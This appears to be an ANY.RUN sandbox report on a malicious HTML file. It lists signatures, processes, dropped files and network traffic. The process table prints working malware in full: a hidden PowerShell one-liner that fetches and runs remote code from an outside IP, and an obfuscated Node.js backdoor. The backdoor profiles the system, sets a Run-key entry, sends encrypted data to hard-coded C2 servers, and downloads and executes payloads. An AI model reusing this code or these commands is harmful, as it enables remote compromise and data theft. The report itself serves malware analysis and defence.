download:

/

Full analysis: https://app.any.run/tasks/fb5d0399-a137-48ef-a039-c4c229f5c1bc
Verdict: Malicious activity
Analysis date: April 15, 2025, 16:30:52
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
qrcode
Indicators:
MIME: text/html
File info: HTML document, ASCII text, with very long lines (1172), with no line terminators
MD5:

7FA467D54CB91AF033CD4E2411163D12

SHA1:

A957929F7D985D924099C52B285FB1B072B824D4

SHA256:

D13D0A4E1E59949C81EBE5AC154D94D9B2263C945DB28C7225DD9DBA8F337EE0

SSDEEP:

24:hM0mIJfA+xRhcxKNt+W+urZN/p9bRXHMBe2sgR5AEg5pEI:lmI++x4S9weeRqTpx

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Connects to the CnC server

      • powershell.exe (PID: 5968)

  • SUSPICIOUS

    • Uses SYSTEMINFO.EXE to read the environment

      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 5512)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5968)

    • Executes script using NodeJS

      • node.exe (PID: 4408)

    • Get information on the list of running processes

      • node.exe (PID: 4408)
      • powershell.exe (PID: 5512)

    • Starts POWERSHELL.EXE for commands execution

      • node.exe (PID: 4408)

    • The process checks if current user has admin rights

      • node.exe (PID: 4408)

    • Starts application with an unusual extension

      • powershell.exe (PID: 5512)

    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 5512)

    • Process uses ARP to discover network configuration

      • powershell.exe (PID: 5512)

  • INFO

    • Disables trace logs

      • powershell.exe (PID: 5968)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 5968)

    • Checks proxy server information

      • powershell.exe (PID: 5968)
      • slui.exe (PID: 7916)

    • Reads the software policy settings

      • slui.exe (PID: 2340)
      • slui.exe (PID: 7916)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 5968)
      • powershell.exe (PID: 5512)

    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 5968)

    • The executable file from the user directory is run by the Powershell process

      • node.exe (PID: 4408)

    • Checks supported languages

      • node.exe (PID: 4408)
      • chcp.com (PID: 7404)

    • Changes the display of characters in the console

      • powershell.exe (PID: 5512)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.htm/html | HyperText Markup Language with DOCTYPE (80.6)
.html | HyperText Markup Language (19.3)
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
152
Monitored processes
16
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe systeminfo.exe no specs tiworker.exe no specs slui.exe node.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs chcp.com no specs systeminfo.exe no specs tiworker.exe no specs tasklist.exe no specs arp.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2340"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2772"C:\WINDOWS\system32\systeminfo.exe"C:\Windows\System32\systeminfo.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Displays system information
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\systeminfo.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
2980\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4408"C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe" -e "const a0I=a0W;(function(g,L){const P=a0W,B=g();while(!![]){try{const W=parseInt(P(0x18a))/0x1*(parseInt(P(0x18f))/0x2)+-parseInt(P(0x16e))/0x3+parseInt(P(0x15a))/0x4*(-parseInt(P(0x14a))/0x5)+-parseInt(P(0x15f))/0x6+-parseInt(P(0x160))/0x7+-parseInt(P(0x15c))/0x8*(-parseInt(P(0x18e))/0x9)+-parseInt(P(0x170))/0xa*(-parseInt(P(0x193))/0xb);if(W===L)break;else B['push'](B['shift']());}catch(x){B['push'](B['shift']());}}}(a0B,0x587b1));const a0L=(function(){let g=!![];return function(L,B){const W=g?function(){const Q=a0W;if(B){const x=B[Q(0x1a1)](L,arguments);return B=null,x;}}:function(){};return g=![],W;};}()),a0g=a0L(this,function(){const a=a0W,g=function(){const C=a0W;let x;try{x=Function(C(0x176)+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(n){x=window;}return x;},L=g(),B=L[a(0x15e)]=L[a(0x15e)]||{},W=['log','warn',a(0x1a4),a(0x192),a(0x14d),a(0x153),a(0x1a5)];for(let x=0x0;x<W['length'];x++){const n=a0L[a(0x1aa)][a(0x185)][a(0x158)](a0L),S=W[x],K=B[S]||n;n[a(0x163)]=a0L['bind'](a0L),n[a(0x1a2)]=K[a(0x1a2)][a(0x158)](K),B[S]=n;}});function a0B(){const j=['message','chcp\x2065001\x20>\x20NUL\x202>&1\x20&\x20echo\x20\x27version:\x20','gzipSync','9fGiTzq','2dTKoZZ','off','fail\x20connect\x20to\x20server','error','2673WXSYyU','POST','writeFileSync','\x20/t\x20REG_SZ\x20/d\x20','statusCode','.log','log','zlib','mkdirSync','push','delay','fromCharCode','\x20get\x20commandline','177.136.225.153','apply','toString','useActive','info','trace','path','request','split','http','constructor','headers','replace','powershell.exe','CMD','application/octet-stream','wmic\x20process\x20where\x20processid=','join','reg\x20add\x20','15XDTlNk','replaceAll','\x27\x20;\x20if\x20([Security.Principal.WindowsIdentity]::GetCurrent().Name\x20-match\x20\x27(?i)SYSTEM\x27)\x20\x20{\x20\x27Runas:\x20System\x27\x20}\x20elseif\x20(([Security.Principal.WindowsPrincipal]\x20[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))\x20{\x20\x27Runas:\x20Admin\x27\x20}\x20else\x20{\x20\x27Runas:\x20User\x27\x20}\x20;\x20systeminfo\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20tasklist\x20/svc\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-Service\x20|\x20Select-Object\x20-Property\x20Name,\x20DisplayName\x20|\x20Format-List\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20Get-PSDrive\x20-PSProvider\x20FileSystem\x20|\x20Format-Table\x20-AutoSize\x20;\x20echo\x20\x27=-=-=-=-=-\x27\x20;\x20arp\x20-a','exception','ignore','floor','Execution\x20error:','alloc','EXE','table','ChromeUpdater','cmd.exe','DLL','atst','bind','\x20/v\x20','202892UqGoLI','StatusCode:','3910328NVkkzS','concat','console','1415088oQRpwQ','4472678IDLYVi','child_process','utf-8','__proto__','writeUInt32LE','rundll32.exe','188.34.195.44','chcp\x2065001\x20>\x20$null\x202>&1\x20;\x20echo\x20\x27version:\x20','argv','trim','length','connect\x20to:','node.exe','Error\x20with\x20HTTP\x20request:','1453047WvSbot','subarray','33590fTzNKY','write','pid','45.61.136.202','stderr','match','return\x20(function()\x20','HKCU\x5cSoftware\x5cMicrosoft\x5cWindows\x5cCurrentVersion\x5cRun','unref','readUInt32LE','start','utf8','data','\x27\x20&\x20echo\x20\x27Runas:\x20Unknown\x27\x20&\x20systeminfo','end','close',',start','random','.dll','ooff','ACTIVE','prototype','\x20/f','exit','env','from','568709plXMPo'];a0B=function(){return j;};return a0B();}function a0W(g,L){const B=a0B();return a0W=function(W,x){W=W-0x147;let n=B[W];return n;},a0W(g,L);}a0g();const http=require(a0I(0x1a9)),{execSync,exec,spawn}=require(a0I(0x161)),fs=require('fs'),path=require(a0I(0x1a6)),zlib=require(a0I(0x19a));if(process['argv'][0x1]!==undefined&&process['argv'][0x2]===undefined){const child=spawn(process[a0I(0x168)][0x0],[process['argv'][0x1],'1'],{'detached':!![],'stdio':a0I(0x14e),'windowsHide':!![]});child[a0I(0x178)](),process[a0I(0x187)](0x0);}const ver='000012',PORT_HTTP=0x50,PORT_IP=0x1bb,PORT=0x5a3;let sysinfo=null;function initSysInfo(){const F=a0I;let g;try{let W=execSync(F(0x167)+ver+F(0x14c),{'encoding':F(0x162),'shell':F(0x1ad),'windowsHide':!![]});g=Buffer[F(0x189)](W,F(0x162));}catch(x){try{let n=execSync(F(0x18c)+ver+F(0x17d),{'encoding':F(0x162),'shell':F(0x155),'windowsHide':!![]});g=Buffer[F(0x189)](n,F(0x162));}catch(S){console[F(0x192)](F(0x150),S[F(0x18b)]);}}const L=Buffer[F(0x151)](0x4);L['writeUInt32LE'](Math[F(0x181)]()*0x5f5e100);const B=Buffer[F(0x151)](0x2);B['writeUInt16LE'](0x2f),sysinfo=Buffer[F(0x15d)]([L,B,g]);}function xor(g,L){const v=a0I;let B=L[0x0];for(let W=0x0,x=g[v(0x16a)];W<x;++W){B+=(B+W%0x100)%0x100,g[W]^=(L[W%0x4]^B)%0x100;}}const zlibKey=Buffer[a0I(0x151)](0x4);zlibKey[a0I(0x164)](0xfafbfdfe);const encKey=Buffer['alloc'](0x4);encKey[a0I(0x164)](0xfafbfdff);function enc(g){const y=a0I,L=Buffer['alloc'](0x4);return L[y(0x164)](Math['random']()*0x5f5e100),xor(g,L),Buffer[y(0x15d)]([zlib[y(0x18d)](Buffer[y(0x15d)]([g,L,encKey])),zlibKey]);}function atst(){const R=a0I,g=R(0x147)+process[R(0x172)]+R(0x19f);exec(g,{'windowsHide':!![]},(L,B,W)=>{const u=R;if(L){console[u(0x192)](''+L[u(0x18b)]);return;}if(W){console[u(0x192)](''+W);return;}const x=String[u(0x19e)](0x22);let n;if(B[u(0x1a2)]()[u(0x175)](/\s-e\s/g)){const K=B[u(0x1a2)]()[u(0x1a8)]('\x0a',0x2)[0x1][u(0x169)]()[u(0x1a8)](/node\.exe.*?\s-e\s+/,0x2)[0x1]['trim']()[u(0x14b)](x,''),H=process[u(0x168)][0x0][u(0x1ac)](u(0x16c),randStr(0x8)+u(0x198));fs[u(0x195)](H,K),n=process[u(0x168)][0x0]+'\x20'+H;}else n=process[u(0x168)][0x0]+'\x20'+process[u(0x168)][0x1];const S=u(0x149)+x+u(0x177)+x+u(0x159)+x+u(0x154)+x+u(0x196)+x+n[u(0x14b)](x,'\x5c'+x)+x+u(0x186);exec(S,{'windowsHide':!![]},(e,D,f)=>{const h=u;e&&console[h(0x192)](''+e[h(0x18b)]),f&&console[h(0x192)](''+f);});});}const TypeFile={'EXE':0x0,'DLL':0x1,'JS':0x2,'CMD':0x3,'ACTIVE':0x4,'OTHER':0x5};function randStr(g){const t=a0I;return Math[t(0x181)]()['toString'](0x24)['substring'](0x2,g+0x2);}function start(g,L){const o=a0I;let B,W=[];switch(L){case TypeFile[o(0x152)]:B=g,W=[];break;case TypeFile[o(0x156)]:B=o(0x165),W=[g+o(0x180)];break;case TypeFile['JS']:B=process['argv'][0x0],W=['-e',g];break;default:return;}const x=spawn(B,W,{'detached':!![],'stdio':o(0x14e),'windowsHide':!![]});x[o(0x178)]();}let lastCmd=null;function startCmd(g){const p=a0I;let L;try{L=spawn(g,{'shell':'cmd.exe','windowsHide':!![]});}catch(W){console['error'](''+W[p(0x18b)]);return;}let B='';L['stdout']['on'](p(0x17c),x=>{const l=p;B+=x[l(0x1a2)]();}),L[p(0x174)]['on']('data',x=>{const O=p;B+=x[O(0x1a2)]();}),L['on'](p(0x17f),x=>{lastCmd=B;});}function main(g,L){const Z=a0I;console[Z(0x199)](Z(0x16b),g);let B=sysinfo;lastCmd!==null?(B=Buffer['concat']([sysinfo,Buffer['from']('\x0a=-c=-m=-d=-=-\x0a','utf-8'),Buffer[Z(0x189)](lastCmd,Z(0x162))]),lastCmd=null):B=Buffer[Z(0x15d)]([sysinfo]);B=enc(B);const W={'hostname':g,'port':L,'path':'/init1234','method':Z(0x194),'headers':{'Content-Type':Z(0x1af),'Content-Length':B[Z(0x16a)]}};return new Promise((x,n)=>{const N=Z,S=http[N(0x1a7)](W,K=>{const k=N,H=[];console[k(0x199)](K[k(0x1ab)]),console[k(0x199)](k(0x15b),K['statusCode']),K['on'](k(0x17c),e=>{const E=k;H[E(0x19c)](e);}),K['on'](k(0x17e),()=>{const s=k,D=Buffer[s(0x15d)](H);if(K[s(0x197)]!==0xc8&&K[s(0x197)]!==0xcc){n(s(0x191));return;}if(K[s(0x197)]===0xcc){x({});return;}if(D[s(0x16a)]===0x4&&D[s(0x1a2)]()===s(0x183))console[s(0x199)](s(0x190)),process[s(0x187)](0x0);else{if(D[s(0x16a)]===0x4&&D[s(0x1a2)]()===s(0x157)){console['log'](s(0x157));try{atst();}catch(d){console[s(0x192)](d);}x({});return;}}const f=D['subarray'](0x0,D[s(0x16a)]-0x4),z=D[s(0x16f)](D[s(0x16a)]-0x4,D[s(0x16a)]);xor(f,z);const Y=f[f[s(0x16a)]-0x1],V=f[s(0x16f)](0x0,f[s(0x16a)]-0x1);let q;switch(Y){case TypeFile['EXE']:q='.exe';break;case TypeFile[s(0x156)]:q=s(0x182);break;case TypeFile['JS']:q='.js';break;case TypeFile[s(0x1ae)]:startCmd(V[s(0x1a2)](s(0x17b))),x({});return;case TypeFile[s(0x184)]:useActive=V[s(0x179)](),x({});return;default:q=s(0x198);break;}let w;Y===TypeFile['JS']?w=V[s(0x1a2)](s(0x17b)):(w=path[s(0x148)](process[s(0x188)]['APPDATA'],randStr(0x8)),fs[s(0x19b)](w,{'recursive':!![]}),w=path[s(0x148)](w[s(0x1a2)](),randStr(0x8)+q),fs['writeFileSync'](w,V),console[s(0x199)](s(0x17a),w)),start(w,Y),x({});});});S['on'](N(0x192),K=>{n(K);}),S[N(0x171)](B),S[N(0x17e)]();});}initSysInfo();const hostsIp=[a0I(0x173),a0I(0x166),a0I(0x1a0)];let useIp=0x0,delay=0x1,useActive=0x0;async function mainloop(){const c=a0I;let g=hostsIp[Math[c(0x14f)](Math[c(0x181)]()*0x3e8)%hostsIp[c(0x16a)]];while(!![]){console[c(0x199)](c(0x19d),delay),await new Promise(L=>setTimeout(L,delay));try{await main(g,PORT_IP);}catch(L){console['error'](c(0x16d),L[c(0x18b)]),g=hostsIp[Math[c(0x14f)](Math[c(0x181)]()*0x3e8)%hostsIp[c(0x16a)]],useIp++,delay=0x3e8*0xa,useActive=0x0;continue;}console[c(0x199)](c(0x1a3),useActive),useActive>0x0?(delay=0x3e8*0xa,--useActive):delay=0x3e8*0x3c*0x5;}}mainloop();" C:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe
powershell.exe
User:
admin
Company:
Node.js
Integrity Level:
MEDIUM
Description:
Node.js JavaScript Runtime
Version:
22.11.0
Modules
Images
c:\users\admin\appdata\roaming\node-v22.11.0-win-x64\node.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\advapi32.dll
4920C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
5512powershell.exe -c "chcp 65001 > $null 2>&1 ; echo 'version: 000012' ; if ([Security.Principal.WindowsIdentity]::GetCurrent().Name -match '(?i)SYSTEM') { 'Runas: System' } elseif (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { 'Runas: Admin' } else { 'Runas: User' } ; systeminfo ; echo '=-=-=-=-=-' ; tasklist /svc ; echo '=-=-=-=-=-' ; Get-Service | Select-Object -Property Name, DisplayName | Format-List ; echo '=-=-=-=-=-' ; Get-PSDrive -PSProvider FileSystem | Format-Table -AutoSize ; echo '=-=-=-=-=-' ; arp -a"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exenode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5892\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exenode.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5968"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -c "$a=159; $b=223; $c=139; $d=207; $e=':8080/'; $u=[string]$a+'.'+$b+'.'+$c+'.'+$d+$e; $t=[math]::Floor(([datetime]::UtcNow-[datetime]'1970-01-01').TotalSeconds/16)*16; iex(irm($u+$t))"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6700"C:\WINDOWS\system32\ARP.EXE" -aC:\Windows\System32\ARP.EXEpowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Arp Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\arp.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\snmpapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
Total events
79 452
Read events
79 447
Write events
5
Delete events
0

Modification events

(PID) Process:(7584) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31174179
(PID) Process:(7584) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
(PID) Process:(5968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
Value:
0100000000000000B228E4F523AEDB01
(PID) Process:(7628) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdHigh
Value:
31174180
(PID) Process:(7628) TiWorker.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation:writeName:SessionIdLow
Value:
Executable files
15
Suspicious files
1 817
Text files
693
Unknown types
0

Dropped files

PID
Process
Filename
Type
5968powershell.exeC:\Users\admin\AppData\Local\Temp\downloaded.zip
MD5:
SHA256:
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\node.exe
MD5:
SHA256:
5968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VP6WPPXB9KYCJH2XAZ3C.tempbinary
MD5:FDB29DD6DB807CBF55C9F2F488CB9ED2
SHA256:AC918F5F5754430763D244E0ACA7CA7DB18C3FC96F7222C009EA0B2090B1C421
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\CHANGELOG.mdhtml
MD5:50E67CCCAB5C16A988474497C21E060B
SHA256:B8AEC39E3CF2FBDF90D560FED838A5AD0DE61420DE69F5696F7BBB60D1C0C8B2
5968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF10c19c.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
5968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_deim3qt3.25q.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lxvnir21.04u.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5968powershell.exeC:\Users\admin\AppData\Roaming\node-v22.11.0-win-x64\install_tools.battext
MD5:BE9D6FF7F9F07F2D35E42A397928F165
SHA256:7F34F73126F62888C7354FEA6EC4ED48679824E8972AE47F650B520055B8A975
5968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:FDB29DD6DB807CBF55C9F2F488CB9ED2
SHA256:AC918F5F5754430763D244E0ACA7CA7DB18C3FC96F7222C009EA0B2090B1C421
7584TiWorker.exeC:\Windows\Logs\CBS\CBS.logtext
MD5:0B7E2E57D407E2FCE762590F356B9F31
SHA256:088DF9FF94BE1FFAA82867B08FC764700A9A19101D88171265D881BEF4BF5C0F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
26
DNS requests
15
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5968
powershell.exe
GET
200
159.223.139.207:8080
http://159.223.139.207:8080/1744734656
unknown
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5968
powershell.exe
POST
200
159.223.139.207:8080
http://159.223.139.207:8080/1744734656
unknown
7788
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7788
SIHClient.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4408
node.exe
POST
204
188.34.195.44:443
http://188.34.195.44:443/init1234
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
2104
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2112
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
5968
powershell.exe
159.223.139.207:8080
DIGITALOCEAN-ASN
US
unknown
6544
svchost.exe
20.190.160.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.241.19
whitelisted
google.com
  • 142.250.186.110
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.131
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
nodejs.org
  • 104.20.3.6
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 95.101.149.131
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.95.31.18
whitelisted

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET MALWARE Generic Malware CnC Activity - (Unix Timestamp In HTTP URI)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
A suspicious string was detected
SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
Potentially Bad Traffic
ET INFO HTTP traffic on port 443 (POST)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
/